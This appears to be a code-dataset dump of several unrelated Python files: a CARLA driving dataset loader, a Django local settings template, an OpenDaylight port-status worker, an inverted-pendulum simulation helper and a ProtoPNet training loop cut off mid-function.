x_0 = self.pose_dict[data_index][file_name][0]
y_0 = self.pose_dict[data_index][file_name][1]
yaw = np.deg2rad(self.pose_dict[data_index][file_name][3])
ts_list = []
relative_t_list = []
x_list = []
y_list = []
vx_list = []
vy_list = []
a_list = []
for i in range(ts_index, len(self.files_dict[data_index])-100):
ts = self.files_dict[data_index][i]
if float(ts)-float(file_name) > self.max_t:
break
else:
x_, y_ = self.tf_pose(data_index, ts, yaw, x_0, y_0)
x_list.append(x_)
y_list.append(y_)
vx_ = self.vel_dict[data_index][ts][0]
vy_ = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*vx_ + np.sin(yaw)*vy_
vy = np.cos(yaw)*vy_ - np.sin(yaw)*vx_
ax_ = self.acc_dict[data_index][ts][0]
ay_ = self.acc_dict[data_index][ts][1]
ax = ax_*np.cos(yaw) + ay_*np.sin(yaw)
ay = ay_*np.cos(yaw) - ax_*np.sin(yaw)
theta_a = np.arctan2(ay, ax)
theta_v = np.arctan2(vy, vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a_list.append(a)
vx_list.append(vx)
vy_list.append(vy)
ts_list.append(ts)
relative_t_list.append(float(ts)-float(file_name))
if len(ts_list) == 0:
continue
else:
#ts = random.sample(ts_list, 1)[0]
ts_array = random.sample(ts_list, self.traj_steps)
#weights = [np.exp(-0.23*(float(ts)-float(file_name))) for ts in ts_list]
#sample_ts = random.choices(ts_list, weights)[0]
#print(weights/sum(weights))
break
#ts = sample_ts
# [0 ~ 1]
# v0
_vx_0 = self.vel_dict[data_index][file_name][0]
_vy_0 = self.vel_dict[data_index][file_name][1]
v_0 = np.sqrt(_vx_0*_vx_0 + _vy_0*_vy_0)
v_0 = torch.FloatTensor([v_0])
v0_array = [v_0]*self.traj_steps
t_array = []
xy_array = []
vxy_array = []
axy_array = []
a_array = []
for ts in ts_array:
t = torch.FloatTensor([float(ts)/self.max_t - float(file_name)/self.max_t])
t_array.append(t)
# x, y
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
xy_array.append(xy)
# yaw_t
#yaw_t = angle_normal(np.deg2rad(self.pose_dict[data_index][ts][3]) - yaw)
#yaw_t = torch.FloatTensor([yaw_t/np.pi])# [-1, 1]
# vx, vy
_vx = self.vel_dict[data_index][ts][0]
_vy = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*_vx + np.sin(yaw)*_vy
vy = np.cos(yaw)*_vy - np.sin(yaw)*_vx
vxy_array.append(torch.FloatTensor([vx, vy]))
# ax, ay
_ax = self.acc_dict[data_index][ts][0]
_ay = self.acc_dict[data_index][ts][1]
ax = _ax*np.cos(yaw) + _ay*np.sin(yaw)
ay = _ay*np.cos(yaw) - _ax*np.sin(yaw)
axy_array.append(torch.FloatTensor([ax, ay]))
theta_a = np.arctan2(_ay, _ax)
theta_v = np.arctan2(_vy, _vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a_array.append(a)
t = torch.FloatTensor(t_array)
v_0 = torch.FloatTensor(v0_array)
xy = torch.stack(xy_array)
vxy = torch.stack(vxy_array)
axy = torch.stack(axy_array)
a = torch.FloatTensor(a_array)
#vxy = torch.FloatTensor([vx, vy])
#axy = torch.FloatTensor([ax, ay])
x_list = torch.FloatTensor(x_list)
y_list = torch.FloatTensor(y_list)
vx_list = torch.FloatTensor(vx_list)
vy_list = torch.FloatTensor(vy_list)
a_list = torch.FloatTensor(a_list)
relative_t_list = torch.FloatTensor(relative_t_list)
if self.evalmode:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0,
'a_list':a_list,
'x_list':x_list, 'y_list':y_list,
'vx_list':vx_list, 'vy_list':vy_list,
'ts_list':relative_t_list}
else:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0}
class CARLADataset(Dataset):
def __init__(self, data_index, dataset_path='/media/wang/DATASET/CARLA/town01/', eval_mode=False):
self.data_index = data_index
self.eval_mode = eval_mode
img_height = 128
img_width = 256
label_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.ToTensor(),
transforms.Normalize((0.5), (0.5))
]
img_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.ColorJitter(brightness=0.2,contrast=0.2,hue=0.2),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
nav_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.RandomRotation(15, resample=Image.BICUBIC, expand=False),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
self.label_transforms = transforms.Compose(label_transforms)
self.img_transforms = transforms.Compose(img_transforms)
self.nav_transforms = transforms.Compose(nav_transforms)
self.dataset_path = dataset_path
self.files_dict = {}
self.total_len = 0
for index in self.data_index:
self.read_img(index)
def read_img(self, index):
files = glob.glob(self.dataset_path+str(index)+'/pm/*.png')
file_names = []
for file in files:
file_name = file.split('/')[-1][:-4]
file_names.append(file_name)
file_names.sort()
self.files_dict[index] = file_names
def __getitem__(self, index):
mirror = False#True if random.random() > 0.5 else False
data_index = random.sample(self.data_index, 1)[0]
while True:
try:
file_name = random.sample(self.files_dict[data_index], 1)[0]
# img
img_path = self.dataset_path + str(data_index)+'/img/'+file_name+'.png'
img = Image.open(img_path).convert("RGB")
# nav
nav_path = self.dataset_path + str(data_index)+'/nav/'+file_name+'.png'
nav = Image.open(nav_path).convert("RGB")
# label
label_path = self.dataset_path + str(data_index)+'/pm/'+file_name+'.png'
label = Image.open(label_path).convert('L')
# mirror the inputs
if mirror:
img = Image.fromarray(np.array(img)[:, ::-1, :], 'RGB')
nav = Image.fromarray(np.array(nav)[:, ::-1, :], 'RGB')
label = Image.fromarray(np.array(label)[:, ::-1], 'L')
img = self.img_transforms(img)
nav = self.nav_transforms(nav)
label = self.label_transforms(label)
break
except:
pass
if not self.eval_mode:
input_img = torch.cat((img, nav), 0)
return {'A': input_img, 'B': label}
else:
return {'A1': img, 'A2': nav, 'B': label, 'file_name':file_name}
def __len__(self):
return 100000000000
class FakeCostMapDataset(Dataset):
def __init__(self, data_index, opt, dataset_path='/media/wang/DATASET/CARLA_HUMAN/town01/', evalmode=False):
self.evalmode = evalmode
self.data_index = data_index
self.max_dist = opt.max_dist
self.max_t = opt.max_t
img_height = 200
img_width = 400
img_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.ColorJitter(brightness=0.2,contrast=0.2,hue=0.2),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
self.transform = transforms.Compose(img_transforms)
nav_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.RandomRotation(15, resample=Image.BICUBIC, expand=False),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
self.nav_transforms = transforms.Compose(nav_transforms)
self.dataset_path = dataset_path
self.pose_dict = {}
self.vel_dict = {}
self.files_dict = {}
self.total_len = 0
for index in self.data_index:
self.read_pose(index)
self.read_vel(index)
self.read_img(index)
def read_pose(self, index):
file_path = self.dataset_path+str(index)+'/state/pos.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
x = float(sp_line[1])
y = float(sp_line[2])
z = float(sp_line[3])
yaw = float(sp_line[5])
ts_dict[ts] = [x, y, z, yaw]
self.pose_dict[index] = ts_dict
def read_vel(self, index):
file_path = self.dataset_path+str(index)+'/state/vel.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
vx = float(sp_line[1])
vy = float(sp_line[2])
vz = float(sp_line[3])
ts_dict[ts] = [vx, vy, vz]
self.vel_dict[index] = ts_dict
def read_img(self, index):
files = glob.glob(self.dataset_path+str(index)+'/ipm/*.png')
file_names = []
for file in files:
file_name = file.split('/')[-1][:-4]
file_names.append(file_name)
file_names.sort()
self.files_dict[index] = file_names
def tf_pose(self, data_index, ts, yaw, x_0, y_0):
x_t = self.pose_dict[data_index][ts][0]
y_t = self.pose_dict[data_index][ts][1]
dx = x_t - x_0
dy = y_t - y_0
x = np.cos(yaw)*dx + np.sin(yaw)*dy
y = np.cos(yaw)*dy - np.sin(yaw)*dx
return x, y
def __getitem__(self, index):
data_index = random.sample(self.data_index, 1)[0]
while True:
file_name = random.sample(self.files_dict[data_index][:-120], 1)[0]
image_path = self.dataset_path + str(data_index)+'/img/'+file_name+'.png'
img = Image.open(image_path).convert("RGB")
img = self.transform(img)
# nav
nav_path = self.dataset_path + str(data_index)+'/nav/'+file_name+'.png'
nav = Image.open(nav_path).convert("RGB")
nav = self.nav_transforms(nav)
input_img = torch.cat((img, nav), 0)
x_0 = self.pose_dict[data_index][file_name][0]
y_0 = self.pose_dict[data_index][file_name][1]
yaw = np.deg2rad(self.pose_dict[data_index][file_name][3])
self.files_dict[data_index].sort()
ts_index = self.files_dict[data_index].index(file_name)
ts_list = []
x_list = []
y_list = []
for i in range(ts_index+1, len(self.files_dict[data_index])-100):
ts = self.files_dict[data_index][i]
_x_t = self.pose_dict[data_index][ts][0]
_y_t = self.pose_dict[data_index][ts][1]
distance = np.sqrt((x_0-_x_t)**2+(y_0-_y_t)**2)
if distance > self.max_dist or (float(ts)-float(file_name) > self.max_t):
break
else:
if distance < 0.03:
pass
else:
x_, y_ = self.tf_pose(data_index, ts, yaw, x_0, y_0)
x_list.append(x_)
y_list.append(y_)
ts_list.append(ts)
if len(ts_list) == 0:
continue
else:
ts = random.sample(ts_list, 1)[0]
break
# [0 ~ 1]
t = torch.FloatTensor([float(ts)/self.max_t - float(file_name)/self.max_t])
_vx_0 = self.vel_dict[data_index][file_name][0]
_vy_0 = self.vel_dict[data_index][file_name][1]
vx_0 = np.cos(yaw)*_vx_0 + np.sin(yaw)*_vy_0
#vy_0 = np.cos(yaw)*_vy_0 - np.sin(yaw)*_vx_0
v_0 = torch.FloatTensor([vx_0])
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
# [-1, 1]
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])
yaw_t = angle_normal(np.deg2rad(self.pose_dict[data_index][ts][3]) - yaw)
# [-1, 1]
yaw_t = torch.FloatTensor([yaw_t/np.pi])
_vx = self.vel_dict[data_index][ts][0]
_vy = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*_vx + np.sin(yaw)*_vy
vy = np.cos(yaw)*_vy - np.sin(yaw)*_vx
vxy = torch.FloatTensor([vx, vy])
x_list = torch.FloatTensor(x_list)
y_list = torch.FloatTensor(y_list)
if self.evalmode:
return {'img': input_img, 't': t, 'xy':xy, 'vxy':vxy, 'v_0':v_0, 'yaw_t': yaw_t, 'x_list':x_list, 'y_list':y_list}
else:
return {'img': input_img, 't': t, 'xy':xy, 'vxy':vxy, 'v_0':v_0}
def __len__(self):
return 100000000000
if __name__ == '__main__':
import argparse
from datetime import datetime
from PIL import Image, ImageDraw
from torch.utils.data import DataLoader
random.seed(datetime.now())
torch.manual_seed(666)
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_name', type=str, default="mu-log_var-test", help='name of the dataset')
parser.add_argument('--width', type=int, default=400, help='image width')
parser.add_argument('--height', type=int, default=200, help='image height')
parser.add_argument('--scale', type=float, default=25., help='longitudinal length')
parser.add_argument('--batch_size', type=int, default=1, help='size of the batches')
parser.add_argument('--img_step', type=int, default=3, help='RNN input image step')
parser.add_argument('--traj_steps', type=int, default=8, help='traj steps')
parser.add_argument('--max_dist', type=float, default=25., help='max distance')
parser.add_argument('--max_t', type=float, default=3., help='max time')
opt = parser.parse_args()
train_loader = DataLoader(CostMapDataset(data_index=[1,2,3,4,5,6,7,9,10], opt=opt, dataset_path='/media/wang/DATASET/CARLA_HUMAN/town01/', evalmode=True), batch_size=1, shuffle=False)
cnt = 0
for i, batch in enumerate(train_loader):
img = batch['img'][:,-1,:].clone().data.numpy().squeeze()*127+128
img = Image.fromarray(img).convert("RGB")
draw =ImageDraw.Draw(img)
real_x = batch['x_list'].squeeze().data.numpy()
real_y = batch['y_list'].squeeze().data.numpy()
real_u, real_v = xy2uv(real_x, real_y)
for i in range(len(real_u)-1):
draw.line((real_v[i], real_u[i], real_v[i]+1, real_u[i]+1), 'blue')
draw.line((real_v[i], real_u[i], real_v[i]-1, real_u[i]-1), 'blue')
#draw.line((real_v[i]+1, real_u[i], real_v[i+1]+1, real_u[i+1]), 'blue')
#draw.line((real_v[i]-1, real_u[i], real_v[i+1]-1, real_u[i+1]), 'blue')
#if cnt % 10 == 0:
# img.show()
cnt += 1
if cnt > 50:
break
#break
| 40.037363 | 187 | 0.512433 |
17cfa0bbbc59e69720514191fc68640d906b0bb1
| 821 |
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings/local.py
|
uhuramedia/cookiecutter-django
|
8d21b960661aea42bb9e447193321b574b1a1e9f
|
[
"BSD-3-Clause"
] | 2 |
2015-04-17T22:00:02.000Z
|
2015-08-14T03:53:33.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings/local.py
|
uhuramedia/cookiecutter-django
|
8d21b960661aea42bb9e447193321b574b1a1e9f
|
[
"BSD-3-Clause"
] | 38 |
2015-01-13T13:20:49.000Z
|
2017-02-08T13:04:34.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings/local.py
|
uhuramedia/cookiecutter-django
|
8d21b960661aea42bb9e447193321b574b1a1e9f
|
[
"BSD-3-Clause"
] | 8 |
2015-03-31T09:32:38.000Z
|
2018-06-29T02:58:53.000Z
|
# -*- coding: utf-8 -*-
from base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': '{{cookiecutter.project_name}}',
'HOST': 'localhost',
'USER': 'root',
'PASSWORD': '',
'CONN_MAX_AGE': 600,
}
}
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
}
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
TEMPLATE_CONTEXT_PROCESSORS += ('django.core.context_processors.debug',)
INTERNAL_IPS = ('127.0.0.1',)
INSTALLED_APPS += (
'debug_toolbar',
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| 19.547619 | 74 | 0.628502 |
6af6d8c9b85c91ea3df80d2c4cdaac9c10cfc6a4
| 5,530 |
py
|
Python
|
networking_odl/ml2/port_status_update.py
|
gokarslan/networking-odl2
|
6a6967832b2c02dfcff6a9f0ab6e36472b849ce8
|
[
"Apache-2.0"
] | null | null | null |
networking_odl/ml2/port_status_update.py
|
gokarslan/networking-odl2
|
6a6967832b2c02dfcff6a9f0ab6e36472b849ce8
|
[
"Apache-2.0"
] | null | null | null |
networking_odl/ml2/port_status_update.py
|
gokarslan/networking-odl2
|
6a6967832b2c02dfcff6a9f0ab6e36472b849ce8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2017 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from neutron.db import provisioning_blocks
from neutron_lib.callbacks import resources
from neutron_lib import constants as n_const
from neutron_lib import context
from neutron_lib.plugins import directory
from neutron_lib import worker
from oslo_log import log
from networking_odl.common import client as odl_client
from networking_odl.common import odl_features
from networking_odl.common import utils
from networking_odl.common import websocket_client as odl_ws_client
LOG = log.getLogger(__name__)
class OdlPortStatusUpdate(worker.BaseWorker):
"""Class to register and handle port status update"""
PORT_PATH = "restconf/operational/neutron:neutron/ports/port"
def __init__(self):
super(OdlPortStatusUpdate, self).__init__()
self.odl_websocket_client = None
def start(self):
super(OdlPortStatusUpdate, self).start()
LOG.debug('OdlPortStatusUpdate worker running')
if odl_features.has(odl_features.OPERATIONAL_PORT_STATUS):
self.run_websocket()
def stop(self):
if self.odl_websocket_client:
self.odl_websocket_client.set_exit_flag()
def wait(self):
"""Wait for service to complete."""
@staticmethod
def reset():
pass
def run_websocket(self):
# OpenDaylight path to recieve websocket notifications on
neutron_ports_path = "/neutron:neutron/neutron:ports"
self.path_uri = utils.get_odl_url()
self.odl_websocket_client = (
odl_ws_client.OpenDaylightWebsocketClient.odl_create_websocket(
self.path_uri, neutron_ports_path,
odl_ws_client.ODL_OPERATIONAL_DATASTORE,
odl_ws_client.ODL_NOTIFICATION_SCOPE_SUBTREE,
self._process_websocket_recv,
self._process_websocket_reconnect,
True
))
def _process_websocket_recv(self, payload, reconnect):
# Callback for websocket notification
LOG.debug("Websocket notification for port status update")
for event in odl_ws_client.EventDataParser.get_item(payload):
operation, path, data = event.get_fields()
if ((operation in [event.OPERATION_UPDATE,
event.OPERATION_CREATE])):
port_id = event.extract_field(path, "neutron:uuid")
port_id = str(port_id).strip("'")
status_field = data.get('status')
if status_field is not None:
status = status_field.get('content')
LOG.debug("Update port for port id %s %s", port_id, status)
# for now we only support transition from DOWN->ACTIVE
# https://bugs.launchpad.net/networking-odl/+bug/1686023
if status == n_const.PORT_STATUS_ACTIVE:
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
port_id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
if operation == event.OPERATION_DELETE:
LOG.debug("PortStatus: Ignoring delete operation")
def _process_websocket_reconnect(self, status):
if status == odl_ws_client.ODL_WEBSOCKET_CONNECTED:
# Get port data using restconf
LOG.debug("Websocket notification on reconnection")
reconn_thread = threading.Thread(
name='websocket', target=self._pull_missed_statuses)
reconn_thread.start()
def _pull_missed_statuses(self):
LOG.debug("starting to pull pending statuses...")
plugin = directory.get_plugin()
filter = {"status": [n_const.PORT_STATUS_DOWN],
"vif_type": ["unbound"]}
ports = plugin.get_ports(context.get_admin_context(), filter)
if not ports:
LOG.debug("no down ports found, done")
return
port_fetch_url = utils.get_odl_url(self.PORT_PATH)
client = odl_client.OpenDaylightRestClient.create_client(
url=port_fetch_url)
for port in ports:
id = port["id"]
response = client.get(id)
if response.status_code != 200:
LOG.warning("Non-200 response code %s", str(response))
continue
odl_status = response.json()['port'][0]['status']
if odl_status == n_const.PORT_STATUS_ACTIVE:
# for now we only support transition from DOWN->ACTIVE
# See https://bugs.launchpad.net/networking-odl/+bug/1686023
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
LOG.debug("done pulling pending statuses")
| 40.661765 | 79 | 0.647197 |
77cbf83eb057b9552ea77d2175a56e8593060943
| 6,122 |
py
|
Python
|
examples/inverted_pendulum/simulate.py
|
ashander/opty
|
85f8c5d75c924d393edcbc07324088c3266bca31
|
[
"BSD-2-Clause-FreeBSD"
] | 63 |
2015-03-07T19:38:10.000Z
|
2022-03-31T17:17:53.000Z
|
examples/inverted_pendulum/simulate.py
|
ashander/opty
|
85f8c5d75c924d393edcbc07324088c3266bca31
|
[
"BSD-2-Clause-FreeBSD"
] | 52 |
2015-02-15T17:24:03.000Z
|
2021-06-18T16:43:45.000Z
|
examples/inverted_pendulum/simulate.py
|
ashander/opty
|
85f8c5d75c924d393edcbc07324088c3266bca31
|
[
"BSD-2-Clause-FreeBSD"
] | 22 |
2015-05-25T21:28:16.000Z
|
2022-03-14T03:55:57.000Z
|
#!/usr/bin/env/python
# standard lib
from collections import OrderedDict
# external
import numpy as np
from scipy.interpolate import interp1d
from scipy.linalg import solve_continuous_are
from pydy.codegen.ode_function_generators import generate_ode_function
from opty.utils import controllable, sum_of_sines
# local
from model import n_link_pendulum_on_cart
def constants_dict(constants):
"""Returns an ordered dictionary which maps the system constant symbols
to numerical values. The cart spring is set to 10.0 N/m, the cart damper
to 5.0 Ns/m and gravity is set to 9.81 m/s and the masses and lengths of
the pendulums are all set to make the human sized."""
return OrderedDict(zip(constants, [10.0, 5.0, 9.81] +
(len(constants) - 1) * [1.0]))
def choose_initial_conditions(typ, x, gains):
free_states = x.T.flatten()
free_gains = gains.flatten()
if typ == 'known':
initial_guess = np.hstack((free_states, free_gains))
elif typ == 'zero':
initial_guess = np.hstack((free_states, 0.1 * np.ones_like(free_gains)))
elif typ == 'ones':
initial_guess = np.hstack((free_states, np.ones_like(free_gains)))
elif typ == 'close':
gain_mod = 0.5 * np.abs(free_gains) * np.random.randn(len(free_gains))
initial_guess = np.hstack((free_states, free_gains + gain_mod))
elif typ == 'random':
initial_guess = np.hstack((x.T.flatten(),
100.0 * np.random.randn(len(free_gains))))
return initial_guess
def input_force(typ, time):
magnitude = 8.0 # Newtons
if typ == 'sine':
lateral_force = magnitude * np.sin(3.0 * 2.0 * np.pi * time)
elif typ == 'random':
lateral_force = 2.0 * magnitude * np.random.random(len(time))
lateral_force -= lateral_force.mean()
elif typ == 'zero':
lateral_force = np.zeros_like(time)
elif typ == 'sumsines':
# I took these frequencies from a sum of sines Ron designed for a
# pilot control problem.
nums = [7, 11, 16, 25, 38, 61, 103, 131, 151, 181, 313, 523]
freq = 2.0 * np.pi * np.array(nums, dtype=float) / 240.0
lateral_force = sum_of_sines(magnitude, freq, time)[0]
else:
raise ValueError('{} is not a valid force type.'.format(typ))
return lateral_force
def compute_controller_gains(num_links):
"""Returns a numerical gain matrix that can be multiplied by the error
in the states of the n link pendulum on a cart to generate the joint
torques needed to stabilize the pendulum. The controller follows this
pattern:
u(t) = K * [x_eq - x(t)]
Parameters
----------
n
Returns
-------
K : ndarray, shape(2, n)
The gains needed to compute joint torques.
"""
res = n_link_pendulum_on_cart(num_links, cart_force=False,
joint_torques=True, spring_damper=True)
mass_matrix = res[0]
forcing_vector = res[1]
constants = res[2]
coordinates = res[3]
speeds = res[4]
specified = res[5]
states = coordinates + speeds
equilibrium_point = np.zeros(len(coordinates) + len(speeds))
equilibrium_dict = dict(zip(states, equilibrium_point))
F_A = forcing_vector.jacobian(states)
F_A = F_A.subs(equilibrium_dict).subs(constants_dict(constants))
F_A = np.array(F_A.tolist(), dtype=float)
F_B = forcing_vector.jacobian(specified)
F_B = F_B.subs(equilibrium_dict).subs(constants_dict(constants))
F_B = np.array(F_B.tolist(), dtype=float)
M = mass_matrix.subs(equilibrium_dict).subs(constants_dict(constants))
M = np.array(M.tolist(), dtype=float)
invM = np.linalg.inv(M)
A = np.dot(invM, F_A)
B = np.dot(invM, F_B)
assert controllable(A, B)
Q = np.eye(len(states))
R = np.eye(len(specified))
S = solve_continuous_are(A, B, Q, R)
K = np.dot(np.dot(np.linalg.inv(R), B.T), S)
return K
def closed_loop_ode_func(system, time, set_point, gain_matrix, lateral_force):
"""Returns a function that evaluates the continous closed loop system
first order ODEs.
Parameters
----------
system : tuple, len(6)
The output of the symbolic EoM generator.
time : ndarray, shape(M,)
The monotonically increasing time values that
set_point : ndarray, shape(n,)
The set point for the controller.
gain_matrix : ndarray, shape((n - 1) / 2, n)
The gain matrix that computes the optimal joint torques given the
system state.
lateral_force : ndarray, shape(M,)
The applied lateral force at each time point. This will be linearly
interpolated for time points other than those in time.
Returns
-------
rhs : function
A function that evaluates the right hand side of the first order
ODEs in a form easily used with odeint.
args : dictionary
A dictionary containing the model constant values and the controller
function.
"""
# TODO : It will likely be useful to allow more inputs: noise on the
# equilibrium point (i.e. sensor noise) and noise on the joint torques.
# 10 cycles /sec * 2 pi rad / cycle
interp_func = interp1d(time, lateral_force)
def controller(x, t):
joint_torques = np.dot(gain_matrix, set_point - x)
if t > time[-1]:
lateral_force = interp_func(time[-1])
else:
lateral_force = interp_func(t)
return np.hstack((joint_torques, lateral_force))
mass_matrix = system[0]
forcing = system[1]
constants = system[2]
coordinates = system[3]
speeds = system[4]
specifieds = system[5]
rhs = generate_ode_function(forcing,
coordinates,
speeds,
constants,
mass_matrix=mass_matrix,
specifieds=specifieds,
generator='cython')
args = (controller, constants_dict(constants))
return rhs, args
| 31.720207 | 80 | 0.63084 |
81636fbcec24e44944d4e59569cfa3b8194ff0f9
| 11,736 |
py
|
Python
|
train_and_test.py
|
apardyl/ProtoPNet
|
b2bbd7284bfc84a37385c0e975408c68cdf64205
|
[
"MIT"
] | 1 |
2021-03-20T13:57:03.000Z
|
2021-03-20T13:57:03.000Z
|
train_and_test.py
|
apardyl/ProtoPNet
|
b2bbd7284bfc84a37385c0e975408c68cdf64205
|
[
"MIT"
] | null | null | null |
train_and_test.py
|
apardyl/ProtoPNet
|
b2bbd7284bfc84a37385c0e975408c68cdf64205
|
[
"MIT"
] | null | null | null |
from enum import Enum
import numpy as np
import torch
from matplotlib import pyplot as plt
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, roc_auc_score, precision_score, recall_score, \
f1_score, roc_curve
from torch.utils.tensorboard import SummaryWriter
import torch.nn.functional as func
from tqdm import tqdm
from focalloss import FocalLoss
from helpers import list_of_distances
from settings import Settings
from weight_loss import WeightCrossEntropyLoss
class TrainMode(Enum):
WARM = 'warm'
JOINT = 'joint'
PUSH = 'push'
LAST_ONLY = 'last_only'
def _train_or_test(model, dataloader, config: Settings, optimizer=None, use_l1_mask=True,
log_writer: SummaryWriter = None, step: int = 0, weighting_attention=False, is_valid=False):
'''
model: the multi-gpu model
dataloader:
optimizer: if None, will be test evaluation
'''
is_train = optimizer is not None
n_examples = 0
n_correct = 0
n_batches = 0
total_cross_entropy = 0
total_cluster_cost = 0
# separation cost is meaningful only for class_specific
total_separation_cost = 0
total_avg_separation_cost = 0
total_loss = 0
conf_matrix = np.zeros((2, 2), dtype='int32')
preds = []
targets = []
if config.loss_function == 'cross_entropy':
loss_fn = torch.nn.CrossEntropyLoss()
elif config.loss_function == 'focal':
loss_fn = FocalLoss(alpha=0.5, gamma=2)
else:
raise NotImplementedError('unknown loss function: ' + config.loss_function)
with tqdm(total=len(dataloader.dataset), unit='bag') as pbar:
for i, (image, label) in enumerate(dataloader):
input = image.cuda()
# if param all_labels=True in dataloader, set label to positive if at least one in the list
if len(label) > 1:
label = label.max().unsqueeze(0)
target = label.cuda()
# torch.enable_grad() has no effect outside of no_grad()
grad_req = torch.enable_grad() if is_train else torch.no_grad()
with grad_req:
output, min_distances, attention, _ = model.forward_(input)
cross_entropy = loss_fn(output, target)
if config.mil_pooling == 'loss_attention':
instance_labels = target * torch.ones(input.size(0), dtype=torch.long, device=input.device)
loss_2 = WeightCrossEntropyLoss()(model.out_c, instance_labels, model.A)
cross_entropy += 2.0 * loss_2
if config.class_specific:
max_dist = (model.prototype_shape[1]
* model.prototype_shape[2]
* model.prototype_shape[3])
# prototypes_of_correct_class is a tensor of shape batch_size * num_prototypes
attention_detached = attention.detach().cpu()
weight = np.interp(attention_detached, (attention_detached.min(), attention_detached.max()), (0.001, 1))
if weighting_attention:
tensor_weight = torch.tensor(weight).cuda()
else:
tensor_weight = torch.tensor(1).cuda()
# calculate cluster cost
prototypes_of_correct_class = torch.t(model.prototype_class_identity[:, label]).cuda()
inverted_distances, _ = torch.max(
(max_dist - (min_distances * tensor_weight.T)) * prototypes_of_correct_class, dim=1)
cluster_cost = torch.mean(max_dist - inverted_distances)
# calculate separation cost
prototypes_of_wrong_class = 1 - prototypes_of_correct_class
inverted_distances_to_nontarget_prototypes, _ = \
torch.max((max_dist - (min_distances * tensor_weight.T)) * prototypes_of_wrong_class, dim=1)
separation_cost = torch.mean(max_dist - inverted_distances_to_nontarget_prototypes)
# calculate avg cluster cost
avg_separation_cost = \
torch.sum((min_distances * tensor_weight.T) * prototypes_of_wrong_class, dim=1) / torch.sum(
prototypes_of_wrong_class,
dim=1)
avg_separation_cost = torch.mean(avg_separation_cost)
if use_l1_mask:
l1_mask = 1 - torch.t(model.prototype_class_identity).cuda()
l1 = (model.last_layer.weight * l1_mask).norm(p=1)
else:
l1 = model.last_layer.weight.norm(p=1)
else:
min_distance, _ = torch.min(min_distances, dim=1)
cluster_cost = torch.mean(min_distance)
l1 = model.last_layer.weight.norm(p=1)
# evaluation statistics
_, predicted = torch.max(output.data, 1)
n_examples += target.size(0)
n_correct += (predicted == target).sum().item()
pred_s = func.softmax(output, dim=-1)
preds.append(pred_s.data.cpu().numpy())
targets.append(target.cpu().numpy())
conf_matrix += confusion_matrix(target.cpu().numpy(), predicted.cpu().numpy(), labels=[0, 1])
n_batches += 1
total_cross_entropy += cross_entropy.item()
total_cluster_cost += cluster_cost.item()
total_separation_cost += separation_cost.item()
total_avg_separation_cost += avg_separation_cost.item()
# compute gradient and do SGD step
if config.class_specific:
loss = (config.coef_crs_ent * cross_entropy
+ config.coef_clst * cluster_cost
+ config.coef_sep * separation_cost
+ config.coef_l1 * l1)
else:
loss = (config.coef_crs_ent * cross_entropy
+ config.coef_clst * cluster_cost
+ config.coef_l1 * l1)
total_loss += loss.item()
if is_train:
optimizer.zero_grad()
loss.backward()
# torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5) # gradient clipping
optimizer.step()
del input
del target
del output
del predicted
del min_distances
pbar.update(1)
total_cross_entropy /= n_batches
total_cluster_cost /= n_batches
total_separation_cost /= n_batches
total_loss /= n_batches
